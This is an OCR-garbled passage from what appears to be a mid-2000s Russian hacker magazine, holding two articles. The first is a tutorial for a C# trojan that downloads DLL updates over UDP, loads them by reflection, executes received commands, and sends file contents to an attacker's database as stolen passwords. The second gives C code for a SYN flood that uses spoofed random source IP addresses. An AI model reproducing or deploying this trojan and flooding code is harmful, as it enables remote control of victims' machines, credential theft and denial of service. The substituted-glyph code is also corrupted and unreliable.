ный рывок вперед! Сам по себе ассемблер не обеспечивает ни 
компактности кода, ни высокой скорости. Все решают хитрые 
трюки и приемы программирования, находчивость и инженер- 
ная смекалка. Главное — выбрать верную стратегию поведения. 
Не пытаться сократить программу на пару байт, которые все 
равно будут потеряны при выравнивании, а реально оценивать 
свой творческий потенциал, сопоставляя его с целями и задача- 
ми операций. Алгоритмическая оптимизация зачастую ускоряет 
программу в десятки раз, в то время как перенос Сишного кода 
на ассемблере обычно дает 1 0%-1 5% выигрыша. Но это еще не 
значит, что ассемблер бесполезен. Просто, как и любой другой 
инструмент, он имеет границы своей применимости, с которыми 
следует считаться, чтобы не попасть впросак! з: 
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БОЛЬШИНСТВО ЗЛО-КОДЕРОВ ОЧЕНЬ СКЕПТИЧЕСКИ 
ОТНОСЯТСЯ К НОВЫМ ТЕХНОЛОГИЯМ в 
ПРОГРАММИРОВАНИИ. ОНИ УТВЕРЖДАЮТ, ЧТО 
ВИРУСЫ НУЖНО ПИСАТЬ ИСКЛЮЧИТЕЛЬНО НА 
АССЕМБЛЕРЕ (ХОТЯ Я С НИМИ НЕ СПОРЮ И ГЛУБОКО 
УВАЖАЮ ТАКИЕ ВЕЛИКИЕ КОМАНДЫ, КАК 29А). НО 
МНЕ КАЖЕТСЯ, ЧТО НАДО ВСЕ-ТАКИ ОСВАИВАТЬ 
НОВЫЕ ТЕХНОЛОГИИ. В ДАННЫЙ МОМЕНТ ВЫХОД 
ѴѴІІХЮОѴѴЗ ѴІЗТА ПЛАНИРУЕТСЯ НА ЯНВАРЬ-ФЕРАЛЬ 
2007 ГОДА. ПОСКОЛЬКУ ѴІЗТА БУДЕТ ИСПОЛЬЗОВАТЬ 
ТЕХНОЛОГИЮ .ІЧЕТ, О НЕЙ И ПОЙДЕТ РЕЧЬ В ЭТОЙ 
СТАТЬЕ. 







к 



Что мы имеем? 

С# предлагает огромное количество возможностей для зло-кодера. 
По-моему, это единственный язык, где так хорошо развита концепция 
объектно-ориентированного программирования. Теперь нам доступны 
такие фичи, как, например, рефлексия кода, новые горизонты нам от- 
крывает СІ_В(Соттоп Ьапдиаде Випііте). Благодаря СІ_В мы можем 
связывать приложения независимо от языка, на котором они написаны. 
Для примера давай напишем Ооѵѵпіоасіег с небольшим набором фун- 
кций. Что он должен уметь? Во-первых, качать, так как это основное 
его назначение. Для закачки файлов обычно используют протокол Ир, 
но это избито и легко обнаруживается антивирусами, файрволами и 
прочими добровольными контролерами. В нашем примере для этой 
цели мы будем использовать протокол 1ЮР(11зег Оаіадгат Ргоіосоі). 
Удобен СЮР тем, что он обеспечивает быстрое обслуживание без ор- 
ганизации соединения, а еще он позволяет использовать групповую 
рассылку, что для злобного софта очень важно. После того как мы за- 
грузим обновление на зараженный компьютер, необходимо его иници- 
ализировать (например, при помощи рефлексии), а заодно мы научим 
наш мерзкий экзешник запускать другие приложения. Кстати, можно 
добавить и функцию работы с базами данных, чтобы он, например, мог 
заносить туда пароли от чего-нибудь, плюшки и прочую полезную для 
хакера инфу. Перейдем непосредственно к кодингу. 

Кодим! 

Начнем с основ. Для начала нам надо соединить клиента с сервером. 
Для этого мы будем использовать пространства имен ЗузІет.ІЧЕТ и 
ЗузІет.ІЧЕТ.ЗоскеІз. С сокетами все осталось, как и раньше, — мы 
просто объявляем переменные и слушаем нужный хакеру порт. 

Работа с сокетами 

ІРНозІЕпІгу Нозі = □пз.ВезоІѵе("ІосаІІпоз!"); 

ІРАсІсІгезз ір = Иоз1.АсІсІгеззиз1[0]; // создаем сокет и слушем 11000 порт 
ІРЕпсІРоіпІ ер = пеѵѵ ІРЕпсІРоіп1(ір, 11000); 

Зоскеі Іізіп = пеѵѵ Зоске1(АсІсІгез5РатіІу.Іп1егМе1ѵѵогк, ЗоскеІТуре.Зігеат, 
РгоІосоІТуре.Тср); 

Іізіп. ВіпсІ(ер); 

Іізіп. І_із1еп(10); 

Теперь надо разобраться с тем, каким образом троян будет качать фай- 
лы. Для этого мы будем использовать класс ШрСІіепІ. Вот основные 
функции класса, которые нам будут нужны: Соппес1(), Зепб(), Ресеіѵе(). 
Для закачки файлов также необходимо использовать пространство 
имен ЗузІет.ТГігеабіпд и его класс РІІеЗігеат. Теперь напишем класс, 
который будет получать обновления от хакера с 12000 порта: 

Класс для закачки файлов 

риЫіс сіазз ІВесѵ 
{ 

риЫіс зіаііс ІРЕпсІРоіпІ ВетЕр = пиІІ; 

риЫіс зіаііс РІІеЗігеат ІЗігеат; //объявляем переменные 

риЫіс зіаііс Ьу1е[] гВуІе = пеѵѵ Ву1е[0]; 



риЫіс зіаііс іпі рогі = 12000; 

риЫіс зіаііс ШрСІіепІ иф = пеѵѵ ШрСІІепІ(рогІ); 

риЫіс зіаііс ѵоісі ВесРІІе() 

{ 

гВуІе = иф.Весеіѵе(ге1 ВетЕр); //ловим данные по иф 
ІЗігеат = пеѵѵ РІІеЗігеат("Тгоу_ирсІа1е.сІІІ", РІІеМосІе.СгеаІе, 

РІІеАссезз.ВеасІѴѴгіІе, РііеЗІпаге.ВеасІѴѴгіІе); //создаем файл 
ІЗігеат. ѴѴгі1е( гВуІе, 0, гВуІе. ЬепдІГі); //пишем в него 

ІЗігеат. СІозе(); 
иф.СІозе(); 

} 

В клиенте должен быть реализован соответствующий класс для от- 
правки файла. При желании хакер может написать на перле неболь- 
шой СЮР зегѵег, чтобы посылать файлы не со своего компьютера, а с 
какого-нибудь удаленного піх-шелла. В клиенте используем такие же 
пространства имен, как и в самом трояне. 

Класс для отправки файла 

риЫіс сіазз ЗпсІРІІе 
{ 

риЫіс зіаііс ІРЕпсІРоіпІ ер; 

риЫіс зіаііс РІІеЗігеат ІЗігеат; //объявляем переменные 

риЫіс зіаііс ІРАсІсІгезз гетоІеІР; 

риЫіс сопзі іпі рогі = 12000; 

риЫіс зіаііс ШрСІіепІ зегѵ = пеѵѵ ШрСІІеп1(); 

риЫіс зіаііс ѵоісі ЗепсІРІІе() 

{ 

Ьу1е[] Ьиіі = пеѵѵ Ьу1е[13ігеат.І_епд1Іі]; 

ІЗігеат. ВеасІ(Ьи11, 0, Ьи11.І_епд1Іп); //читаем файл 

СопзоІе.\Л/гі1еІ_іпе("ЗепсІіпд Рііе... "); 

зегѵ.5епсІ(Ьи11, ЬиГГ.ЬепдІТі, ер); 

//посылаем данные трояну по иф 

ІЗігеат. СІозе(); 

зегѵ.СІозе(); 

} 

} 

После того как троян загрузил файл, он может с ним делать все, что 
угодно. Если нужно — запустить функцией Ргосезз.31аг1(ргос_пате), а 
если же есть потребность подгрузить сІІІ, то можно воспользоваться 
модным методом рефлексии. 

Рефлексия 

Нововведением технологии ,І\ІЕТ является процесс рефлексии типов 
данных. Используя данный процесс, программа может обнаруживать 
типы данных во время своей работы или после подгрузки сІІІ. 
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Это очень удобно, поскольку программист может получать инфор- 
мацию о коде без всякого дизассемблера, и при этом на языке С#Ш 
Данные можно получать о любом члене типа данных. Таким образом, 
можно получать информацию об интерфейсах, поддерживаемых нуж- 
ным нам классом, значения переменных, параметры методов (если все 
они определены как риЫіс). Для написания соответствующего класса 
нам надо использовать пространство имен ЗузІет.РеІІесІіоп и Зузіет. 
Асііѵаіог. Например, чтобы загрузить какую-либо инфу из бІІ-библиоте- 
ки, мы должны зарегать переменную типа АззетЫеу и потом методом 
АззетЫеу.І_оасІ() загрузить код из библиотеки. Если программе нужно 
получить информацию о типах данных, которые она загрузила, то для 
этого нужно выполнить такой код: 



Записываем пароли и явки? 

Для работы с файлами существует пространство имен Зузіет.ІО. 
Для работы с текстовыми файлами нам нужны классы ЗігіпдРеабег 
и ЗігіпдѴѴгіІег. Очень интересные возможности открывает класс 
ВіпагуВеасІег и ВіпагуѴѴгіІег, позволяя программе читать и писать двоич- 
ные данные. Этому ты сможешь научить троян сам. Если хочешь, могу 
привести простой пример: 

РІІеЗігеат ІЗігеат = пеѵѵ РіІеЗігеат("Ьіпагу_гѵѵ.сІа1:", //создаем файл 
РІІеМосІе.ОрепОгСгеаіе, РІІеАссезз.НеасІѴѴгіІе); 

ВіпагуѴѴгііег ЬѴѴгііе = пеѵѵ ВіппагуѴѴгііефЗігеат); 

ЬѴѴгіІе .ѴѴгііеЗІгі пд ("Хакер ВиІе2"); //пишем в файл 

Иоаі іезі = 29.987654 //давайте еще что-нибудь напишем.. 



ріид = АззетЫу.Цоаб("Тгоу_ирсІа1:е"); //загружаем сІІІ 

рІид.ОеіЕхрогіесІТурезО; //получаем информацию о типах 

Функция ОеіЕхрогІебТурезО возвращает данные параметру ріид. 
РиІІЫате. Для запуска функции необходимо использовать функ- 
цию МеФюсІІпІо.ІпѵокеО, предварительно создав объект методом 
Асііѵаіог.СгеаіеІпзіапсеО и получив объект из сІІГки методом АззетЫеу. 
(ЗеГГуре(). 

В итоге мы сможем получить информацию о типе и использовать за- 
груженный код. Реализуем это вот так: 

Рефлексия 

АззетЫу ріид = пиІІ; 

ріид = АззетЫу. ЦоасІ("Тгоу_ирсІаіе"); //загружаем сІІІ в память 



ЬѴѴгііе.ѴѴгііе^езІ:); //написали еще... 

А для того, чтобы стырить пароли (свои, забытые пароли ;)), мы будем 
использовать ранее упомянутый класс ЗігіпдВеасІег. 

Делается это, как всегда, одной строкой кода: 

ЗігеатПеасІег іехі = РІІе.ОрепТехі("С:/Лезі.М"); 

После того как программа открыла файл, она может в нем копо- 
шиться, используя функции класса ТехіВеасІег, например ТехіВеабег. 
РеабЫпеО. Таким образом, мы можем утянуть какую-то инфу из фай- 
ла. Затем можем передать ее хакеру через сокет, используя функцию 
8оске1.3епб(), однако это довольно избитый способ. Гораздо удобнее 
передать данные о пароле через базу данных, которую читает хакер, а 
еще лучше — перловый скрипт, написанный хакером. 



рІид.ОеіЕхрогіесІТурезО; 




СопзоІе.ѴѴгііеипе("І_оасІесІ ріидіп: {0}", рІид.РиІІІЧате); 

Туре асііоп = рІид.ОеіТуре("Тгоу_ирсІа1:е.Оо"); //выбираем нужный нам класс 
оЬіесі йо = Асііѵаіог.СгеаіеІпзіапсе(асііоп); //создаем этот класс 

МеІІіосІІпІЪ МісПЫо = асііоп.ОеіМеібосІ("заѵе_Іод");// выбираем метод нашего класса 
МІсПЫо.ІпѵокеРо, пиІІ); // вызываем метод без параметров 

зігіпд ІоасІесІ = "Ріидіп із ІоасІесІ."; 

Ьуіе[] І_ок = ЕпсоЦіпд.АЗСІІ.ОеІВуІез(ІоасІесІ); //передаем хакеру, что плагин 
Гіп<±ЗепсІ(І_ок); //загружен 

Чем все это может помочь хакеру? А тем, что с выходом ѴѴіпбоѵѵз Ѵізіа 
вместо ВНО(Вгоѵѵзег Неірег ОЬіесІ) можно будет встраивать код в ІЕ, 
а это находка для не очень добрых программистов ;). Кстати, с таким 
же успехом благодаря рефлексии мы можем «отделять» куски кода от 
программы и создавать сІІІ по ходу ее работы. 



Работаем с базами данных 

В мире баз данных Майкрософт активно проталкивает свою техноло- 
гию АЭО.ІЧЕТ и свой могучий МісгозоІІ: ЗОЕ Зегѵег 2005, с которым мы и 
будем работать (напомню, что мы практикуем только самые новые тех- 
нологии). Технология АЭО.ІЧЕТ включает в себя 2 провайдера ОІеЭВ и 
ЗОЬ, последним мы и займемся. Ничего практически не изменилось — 
объектно-ориентированные базы данных остались в силе. Для работы 
с базами данных Майкрософт одарила нас пространством имен Зузіет. 
Эаіа, а если быть точным, то не с самой базы, а только с данными, по- 
лученными из базы или отправляемыми в нее. Вот нужные нам типы 
данных этого пространства имен: ЭаІаВоѵѵ, ЭаіаТаЫе, ЭаІаСоІитп и 
ЭаіаЗеЕ Для соединения с базой мы будем использовать пространство 
имен ЗузІет.ЭаІа.ЗдІТурез и ЗузІет.ЭаІа.ЗдІСІіеп, добавлять данные 
будем с помощью объекта ЗдЮаіаАбаріег.ІпзегЮоттапсІ. Для того 
чтобы заполнить таблицу данными и отправить их на сервер, необхо- 
димо использовать тип данных ЭаіаВоѵѵ и метод Во\л/з.Абб(Ва1аВоѵѵ). В 
итоге мы получим метод для отправки пароля в базу данных (смотри 
соответствующую врезку). 

Теперь мы оборудовали наш троян самыми необходимыми функциями 
— он почти закончен. Кстати, для тех, кто захочет реализовать плагин- 
ную технологию, советую почитать предыдущие номера X, а именно: 
статью «Универсальная армия», в которой мы об этом писали. Теперь 
хорошо бы написать клиент :). 





Ваяем клиент 

Для передачи данных мы будем использовать те же прото- 
колы, что и в трояне — ТСР и ІЮР (напомню: наша прога 
висит на ІІООО(іср) и 12000(исІр) портах). Для начала оп- 
ределимся, как мы будем передавать информацию. Я не 
заморачивался на эту тему и без всяких извращений ре- 
шил отправлять текст напрямую. При желании ты сможешь 
сделать какое-нибудь шифрование, используя пространс- 
тва имен ЗузІет.ЗесигіІу и ЗузІет.ЗесигіІу.СгурІюдгарІіу. 
Кстати, советую тебе не придумывать свои криптографи- 
ческие алгоритмы. Если ты не гениальный математик, все 
равно найдут дырку, поэтому используй майкрософтовс- 
кий СгурЩ АРІ. Для передачи текста через сокет его нуж- 
но преобразовать в тип Ьуіе (для этого существует метод 
Епсобіпд.АЗСІІ.(ЗеіВу1:ез(зІгіпд)), и после соединения соке- 
тов его можно будет послать методом Зепб(). 

В результате наш троян, когда будет получать сообщение 
от клиента, будет пытаться найти аналогичное у себя, а в 
случае, если не найдет — будет пытаться выполнить по- 
лученную строку как программу (имеется в виду Ргосезз. 
31аг1(ргос_пате)). 

Все готово! 

Теперь мы можем соединяться с нашей недоброй програм- 
мкой, посылать ей команды, заливать на свой рабочий ком- 
пьютер файлы, законным образом уводить с него пароли и 
отправлять их в базу данных, устанавливать плагины. Если 
ты не поленишься разобраться с исходным кодом на на- 
шем диске, то к выходу Висты будешь «в теме». На этом 
простом примере видно, насколько широки и необъятны 
возможности программирования на основе технологии 
,І\ІЕТ. Сколько новых креативных способов Майкрософт 
дарит хакерам и вирусописателям для создания новых 
творений! А что будет, если вместо ВНО мы встроим в гря- 
дущий Іпіегпеі Ехріогег 7.0 свой плагин, который получает 
код, или на основе технологии рефлексии динамически 
выгрузим какой-нибудь класс из кода ІЕ7? В общем, гря- 
дущая Виста обещает нам очень много хороших дырок... 
Напоследок скажу, что распространять и писать вирусы 
— не лучшее занятие, не стоит портить себе жизнь тюрь- 
мой и прочей дрянью. Удачи! зс 



и/ЕвЩ 

| _ Ш Советую почитать тзсіп: 

(ИДр://тзбп.тісгозоІ1.сот/ІіЬгагѵ/гиз/беІаиІ1. 

азр?игІ=/ІіЬгагѵ/гиз/ѵзіп1го7/Іі1тІ/ѵзз1аг1раае.азр) 
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НУЖНА ЛИ ТЕХНОЛОГИЯ 

.ЫЕТ? 

Сегодня многие спорят на тему «стоит ли переходить на 
платформу .ЫЕТ»? Консерваторы с пеной у рта доказыва- 
ют, что это бред, и надо писать на Си (в крайнем случае 
— на С++), более смелые активно выступают за освоение 
этой технологии, так как она открывает новые возмож- 
ности программирования. Все эти споры беспочвенны. Я 
бы ответил на этот вопрос так: «Придется». Майкрософт 
активно проталкивает ,І\ІЕТ (тем более что І\ІЕТ Ігатеѵѵогк 
будет включен в ѴѴіпбоѵѵз Ѵізіа), а воле Майкрософта со- 
противляться бесполезно — в любом случае они сделают 
так, как хочется им (так же, как они поступили с ЭігесІХ 8 и 
ЭігесіХ 9). Те, кто говорит, что нельзя изучать то, что меня- 
ется у тебя в руке, не правы, так как во всем можно найти 
какую-либо закономерность и рациональность. 
Ассемблерщики утверждают, что им ничего больше не 
нужно, но с появлением СЕВ придется переучиваться и им, 
так как писать старые добрые РЕ-инфекторы больше не 
получится. 

Веб-программистам сопротивляться глупо, так как АЗР. 
І\ІЕТ очень удобен: любой С# или ѵ++ кодер теперь может 
сваять сайт на своем языке без знания рйр или Явы. Про- 
граммисты, работающие на разных языках, могут работать 
в одном проекте и написать одно приложение, поскольку 
все компилируется в единый код. Но ведь это то, к чему 
шло программирование долгие годы! Это не просто про- 
гресс для какого-то круга людей, а прогресс для всей 
индустрии программирования (как обычного, так и ѵѵеЬ). 
Если кто-нибудь еще не вкурил, нужна ли данная техноло- 
гия программистам, скажу кратко — ЭО ІТ! 

РАБОТАЕМ С БАЗОЙ ДАННЫХ 

ЗігеатВеасІег іехі = РІІе.ОрепТехі("С:/АезихГ); //открываем файл с 
нужной инфой 
зігіпд сІаіа2 = пиІІ; 
зігіпд іприі = пиІІ; 

ѵѵбііе ((іприі = Іехі.ВеасіипеО) != пиІІ) 

{ 

сІа1:а2 = іприі; 

} 

ЗцІСоппесІІоп ЗОІ_с = пеѵѵ //конектимся к базе и вводим 

5дІСоппесІіоп("зегѵег=(ІосаІ);иісІ=1:гоуап; //логин и пароль 
рѵѵсІ=ГіеІІо_і1з_те;сІаіаЬазе=разз\л/огсІз"); 

ЗцЮаІаАсІарІег соппесіесі = пеѵѵ ЗцЮаіаАсІарІегС'зеІесІ: * Дот рѵѵсі", 
ЗОІ_с); //создаем запрос 

//запрос для добавления инфы 

соппесіесІ.ІпзегЮоттапсІ = пеѵѵ ЗдІСоттапсІ("іпзеі1 іпіо рѵѵсі 
(ІезуіпІЪ) ѵаіиез (" + сІа1:а2 + ")", ЗОІ_с); 

ОаіаЗеі ОаіаЗеі = пеѵѵ ОаіаЗеі(); 

соппесІесІ.РІІКОаіаЗеІ:, "рѵѵсі"); //выбираем таблицу 

йаІаРіоѵѵ зепсМ = ОаІаЗеІТаЬІез["рѵѵсГ].І\ІеѵѵРіоѵѵ(); 
зепсМГіезУпД)"] = ба1:а2; //заполняем данные 

ОаіаЗеі.ТаЫез["рѵѵсІ"].Воѵѵз.АсІсІ(зепсІ_сІ); 

соппесіесШрсІаіе(Оаіа5еі, "рѵѵсі"); //отправляем данные 
ОаІаЗеШізрозе(); 

Ьуіе[] зепсПехІ: = ЕпсосІіпд.АЗСІІ.ОеіВуіез("Ок..СІпеск 
уоиг баіаЬазе."); 

Гіп<±ЗепсІ(зепсІ_іехІ); 
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ѴѴОІ.Р О.А. АКА РАУНА5Н 




Сосііпд/ с 



ООоЗ-атаки для 



программиста 



МНОГО УЖЕ ПИСАЛИ 
В НАШЕМ ЖУРНАЛЕ 
ПРО ОООЗ-АТАКИ. ТЫ 
НАВЕРНЯКА ЗНАКОМ 
С ТЕОРИЕЙ ЭТОГО 
ПРОЦЕССА, НО ТАК 
УЖ ПОВЕЛОСЬ, ЧТО 
НИКАКОЕ ХАРДКОР- 
НОЕ ПОВЕСТВОВАНИЕ 
НИКОГДА НЕ ОБХО- 
ДИТСЯ БЕЗ ПРОПИС- 
НЫХ ИСТИН :). ИТАК, 
0003-АТАКА НАПРАВ- 
ЛЕНА НА ИСТОЩЕНИЕ 
ПРОГРАММНО-АППА- 
РАТНЫХ РЕСУРСОВ 
СИСТЕМЫ, КОТОРОЕ 
ПРОИСХОДИТ В РЕ- 
ЗУЛЬТАТЕ ПРОЦЕССА 
НЕПРЕРЫВНОЙ ОБРА- 
БОТКИ «ТЯЖЕЛОГО» 
ПОТОКА ИНФОРМА- 
ЦИИ («ДАВЛЕНИЯ»), 



Допустим, есть некая гипотетическая банка, в 
которую насыпают такой же гипотетический 
неочищенный горох. Эта банка сама очища- 
ет продукт, после чего обработанный горох 
высыпают в другую банку, а шелуху — в сле- 
дующую. Емкость эта может вмещать строго 
определенное количество гороха, и если 
непрерывно и быстро сыпать его в банку, он 
просто начинает высыпаться, и новый горох 
уже не будет обработан и очищен. Банка мо- 
жет увеличиться в размере в соответствии с 
поступлением большего количества гороха. 
На увеличение размеров банки необходимо 
затратить определенное количество энергии 
(ресурсов), а соответственно, и времени. Те- 
перь зададимся вопросом: а что если посто- 
янно увеличивать поток засыпаемого гороха 
в банку настолько быстро, что времени на 
увеличение размеров банки просто не будет 
хватать? Ответ очевиден. 

Постулаты уязвимости системы: 

1. Если существует некая система, то обя- 
зательно найдется и другая, которая сможет 
воздействовать на эту систему. Достаточное 
условие — наличие ошибки Г ейзенберга в уяз- 
вимой системе (ошибки работы с памятью). 

2 . То же самое, но с достаточным условием 
наличия ошибок Бора (попавший мотылек в 
реле Магк-2 на английском военном корабле 
в середине 40-х). 

3. Если существует некая система, то у нее 
есть свой предел «прочности». При наличии 
наивысшей нагрузке на эту систему произой- 
дет сбой. 

В этой схеме нам интересен именно третий 



пункт, поскольку он в большей степени нам 
подходит под пример ЭоЗ-атаки. Рассмотрим 
подробней работу протокола ТОР на уровне 
организации связи. 

Для установки связи между двумя машинами 
по протоколу ТОР машина-инициатор посыла- 
ет запрос с пакетом ЗУЫ. Когда такой пакет 
попадает на хост-получатель, система начи- 
нает его анализировать: для какой службы 
разрешен данный пакет, есть ли эта служба, 
и, если все правильно, обратно отправляет 
пакет с маркером 8ѴІЧАСК. Получив такой 
ответ, хост-отправитель посылает другой па- 
кет с типом АСК, после чего устанавливается 
соединение, которое принято называть ТОР :). 
В обоих случаях предполагается ожидание от- 
вета (это важно помнить). 

Посмотрим на первую картинку. На ней 
мы видим, что машинка с ІР-адресом 
192.168.0.1 отправила пакет на машинку с 
ІР-адресом 192.168.20.20, затем машинка 
с адресом 192.168.20.20 ответила машин- 
ке с адресом 192.168.0.1 — и все прошло 
гладко. А если произойдет то, что не пла- 
нировалось? 

Известно, что протокол ТОР инкапсулиру- 
ется в протоколе ІР, и понятно, что фраг- 
мент ІР-протокола содержит информацию 
о хосте отправителя и хосте получателя. 
Также известно, что всегда можно подде- 
лать поле любого протокола, и протокол 
ІРѵ4 — не исключение. Что же произойдет, 
если изменить адрес отправителя на дру- 
гой адрес? Ответ очевиден: пакет с марке- 
ром ЗѴІЧАСК уйдет другому адресату. 






Посмотрим на вторую картинку. Из нѳѳ видно, что хост с ІР-адресом 
192.168.0.1 посылает подделанный ІР-пакет с другим обратным ІР-ад- 
ресом, например 192.168.30.30 на машину с ІР-адресом 192.168.20.20. 
Естественно, прочитав пакет с флагом ЗѴЫ, она ответит пакетом с 
флагом 5ѴІМАСК. Прочитав поле отправителя (адрес источника), сис- 
тема направит пакет на другой адрес, и им будет 192.168.30.30, поэто- 
му уже не важно, есть ли такой ІР или нет. 

Практикой проверенно, что если на роутере отсутствует контроль ад- 
реса отправителя (РігеѴѴаІІ), то такой пакет не будет им отвергнут, а на- 
оборот, будет «перекинут» дальше. На сегодняшний день провайдеры 
не ведут подобного контроля на своих маршрутизирующих системах 
(им это ни к чему). 

Практика 

Посмотрим, как на языке Си можно подделать пакет ІР. Для этого необ- 
ходимо создать следующую структуру ІР-заголовка: 

іуресіеі зігисі ГісІг_ір 
{ 

/* Здесь не все поля заголовка ІР, подробней смотрим в гіс 792*/ 

/* Контрольная сумма ІР-заголовка 7 
ипзідпесі зГіог! ір_зит; 

/* Аргументы источника и отправителя 7 
зІгисІ Іп_ас1с1г ір_згс, ір_сІз1;; 

} ІРНЕАРЕР; 




Манипуляции производятся с параметрами ір_згс и ір_бз1: иіі, где поко- 




ятся адрес источника и адрес отправителя. 

Мы будем менять адрес источника пакета случайным образом, чтобы, 
согласно третьему постулату, создать нагрузку на удаленную систему. 
Для этого можно использовать следующую функцию — генератор слу- 
чайных ІР-адресов: 

/*В функцию в виде аргумента на вход подаем указатель на буфер*/ 

ЗТВІІЧО гапсІотІ 2 еІР(ЗТВІІ\Ю зр0012б0зІ) 

//где зігіпд это [іуресіеі сбаг *ЗТВІІ\Ю;] 

{ 

// Здесь все донельзя просто, 
іпі і=0; 

ВУТЕ з001ІР[3]; 

1ог(і=0; і <= 3; І++) { 

// генератор ІР-адресов 
з001ІР[і]=гапсІ()%254; 

} 

тетзе^зрООІЗІпОзІ;, 0, ІРЗІ2Е+1); 

зргіпЩзр0012Гі0зІ, "%сІ . %сІ . %сІ . %сГ ,30011 Р[0] , з001ІР[1], з001ІР[2], з001ІР[3]); 

// Возвращаем указатель на сгенерированный ІР-адрес. 
геіигп зрОО^ГіОзі; 




Пример атаки типа 5УА/ 



Итак, со структурой ІР разобрались, с генерацией ІР-адресов — тоже, 








теперь посмотрим на структуру ТСР-заголовка: 



Функция для сборки ТСР/ІР-пакета 



Іуребе! зігисі ЬгСМср { 

Г В качестве сжатия статьи урезаем часть ТСР-заголовка 
За подробной информацией обращайтесь к бю 7937 
ІІЗНОВТ іб_зроб:; // Порт-источник ( может быть любой ) 

ІІ5НОРГГ Іб_броі1; // Порт назначения ( атакующей службы ) 
ипзідпесі сбаг іб_Над; // Этап подключения 0x02 — запрос на начало сеанса 
#бе!іпеТН_ЗѴІ\І 0x02 

ІІЗНОВТ Іб_зит; // Контрольная сумма ТСР-заголовка 
}ТСРНЕАОЕВ; 

Для подсчета контрольных сумм заголовков нам необходимо ввести 
один псевдозаголовок с такой структурой: 

Іуребе! зігисі рзеисІо_ГіеасІег { 
з1гисЦп_аббгзаббг; 



зіаііс и_сбаг *сопзігисіраске1:(и_сГіаг бпейгадтепі, 

зігисі іп_асІсІг згсасісіг, зігисі іп_асІсІг сізіасісіг, и_збоП бзірогі) 

{ 

/Дср/ір-заголовки 
ІРНЕАОЕВ ірркі; // ІР-заголовок 
ТСРНЕАОЕВ ісрркі; //ТСР-заголовок 
РЗОНЕАОЕВ рзеибо; //ТСР/ІР-псевдозаголовок 
Г Обнуление 60 байтТСР/ІР-заголовка 7 
сбаПсрір[60]={0}; 

Г Здесь пишем версию и длину ІР-пакета 7 
Ірркі.ір_ѵб1=(4<<4 1 зігеоІфркД/зігеоІфпзідпеб Іопд)); 
ірркі.ір_іоз=0; // Приоритет пакета 



зігисПп_аббгбаббг; 
сбаггегО; //0 

сбаг рісі; //Тип протокола ІРРВОТО_ТСР 
ипзідпесі збогі ІсрІ; 

} РЗОНЕАОЕР; 

После этого можно смело считать контрольные суммы заголовков ІРѵ4 
протокола (скажу честно: функцию мы дернули из заголовочных файлов 
ОС РгееВЗй, но поскольку это стандарт, в ѴѴіпбоѵѵз тоже работает :)). В 
этом коде придется разбираться самому, благо это не трудно (см. лис- 
тинг на диске). 

Итак, с основными тезисами и понятиями мы разобрались, остается все 
это собрать в кучу и отправить системе, которую собираемся нагружать. 
В этом нам поможет функция, которую можно видеть на листинге 2. Она 
собирает пакет ІРѵ4 и возвращает на него указатель. На вход в нее мы 
подадим четыре аргумента — это указатель на буфер, в котором будем 
записывать собранный ІРѵ4 пакет, адрес отправителя, адрес получателя 
и порт назначения. В этой функции нет ничего особенного - обычное за- 
полнение полей структуры ІР/ТСР, которые мы рассматривали выше. 




/* Длина всего ІР-пакета плюс Іср 7 
ірркі.ірДеп=біопз(зІ2ео7ірркі)+зІ2ео{(1:сррк1:)); 

Іррк1.ір_іб=1 ; //іб-пакета 

ірркі.ір_оТС=0; //смещение 

ірркТір_Ш=128; //время жизни пакета 

ірркі.ір_р=ІРРВОТО_ТСР; //тип протокола 

// контрольная сумма пакета (рассчитываем ниже) 

ірркі.ір_зит=0; 

ірркі.ір_згс=згсаббг; //адрес источника 

Г адрес получателя, на котором будем создавать нагрузку 7 

Ірркі.ір_бз1:=бз1:аббг; 

/* Теперь заполняем ТСР-заголовок7 
Г Порт источника случайный, в диапазоне от 0 до 65000. Не 
удивляйся — нулевые порты тоже существуют 7 
ісррШб_зрогІ=біопз(гапб()%65000); 

Г Порт назначения (на котором будем создавать нагрузку) 7 
ІсррШб_броб=біопз(бзірогІ); 

Г ;) Просто номер пакета, любое число 7 
ісрркШ_зед=біопІ(0х4655434Ь); 

1сррШб_аск=0х00000000; 

Ісрркі.1:б_Іепгез=(зІ2ео7і:сррк1:)/4<<4І0); 

Г ЗУЫ-пакет (попытка установить начало сеанса) 7 

Ісрркиб_^Іад=2; 

ісрркі.іб_\л/іп=біопз(51 2); 

1срркМб_игр=0; 

Г Контрольная сумма ТСР-пакета (рассчитывается ниже) 7 
1сррШб_зит=0; 

Г Заполнение псевдозаголовка для расчета контрольных сумм 7 

рзеибо. заббг=ірркі.ір_згс; 

рзеибо. баббг=ірркІір_бзІ; 

рзеибо. 2ег0=0; 

рзеибо. рІсІ=ІРРВОТО_ТСР; 

рзеибо. 1срІ=б1:опз(зІ2ео{(1:сррк1:)); 

тетсру(ісрір, &рзеибо, зігеофзеибо)); 

тетсруфрір+зігео^рзеибо), &ісрркі, зігеоіфсрркі:)); 

Г Считаем контрольную сумму Іср-заголовка и пишем 
Ір-заголовок в буфер ісрір 7 
1сррШб_зит=іп_скзит((иЗНОПТ*)ісрір, 
зІ2еоі(рзеибо)+ зігео^ісрркі)); 
тетсру(ісрір, &ірркі, зігео^ірркі)); 
тетсруОюрір+зігеофрркі), &1срркі, зігео^срркі)); 
тетзеіДсрір+зігео^ірркД+зігеоІфсрркІ), 0, 4); 




Г Считаем контрольную сумму ІР-заголовка и пишем 
еговбуферісрір7 

ірркі.ір_зит=іп_скзит((Ш5НОВТ*)Ісрір,зІ2ео7ірркі)+зІ2ео{(1:сррк1:)); 
тетсру(ісрір, &ірркі, зІ2еоІ(ірркі)); 

Г Кладем все в буфер іпеіігадтепі:, его же и возвращаем 7 
тетзеі(іпеі7адтепі, 0, зігео^зігисі Ьг0_ір) + зігео^зігисі Ьг0_іср)); 
тетсруОпеІІгадгпепІ:, Ісрір, 
зігео^зігисі Ьг0_ір) + зігео^зігисі ЬгСМср)); 

геіигп іпеіігадтепі:; 

} 
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После того как мы собрали фейк-пакет, его нужно как-то доставить ад- 
ресату. Что же необходимо для этого сделать? Нам нужно элементарное 
умение работать с РАѴѴ Зоскеіз, то есть с сырыми сокетами. Для каждой 
конкретной ОС это делается по-своему, хотя отличия эти не так уж кри- 
тичны (кстати, про работу с ВАѴѴ ЗОСКЕТЗ в X мы уже писали, перевора- 
чивай подшивку «Кодинга». — Прим, редактора). 

До недавнего времени такие вещи можно было делать только в *піх-сис- 
темах, но после выхода ЫТ-технологии виндовые программисты тоже 
получили свой кусочек счастья. Как же это все делается? 

